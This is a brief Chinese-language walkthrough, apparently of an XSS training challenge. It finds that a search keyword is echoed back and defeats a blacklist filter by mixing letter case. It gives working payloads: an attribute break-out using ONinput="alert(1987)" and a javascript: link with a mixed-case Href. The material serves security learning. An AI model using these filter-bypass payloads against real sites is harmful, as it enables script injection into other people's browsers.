第一步:判断是否存在XSS注入漏洞 输入的关键词有进行回显,故存在XSS漏洞 ** 第二步:尝试利用该漏洞 ** 尝试对输入的关键词进行大小写 1987" ONinput="alert(1987) "> <a Href="javascript:alert('test')">link</a> 总结:此题为对关键词和符号的黑名单形式,可以通过对部分字符进行大小写来绕过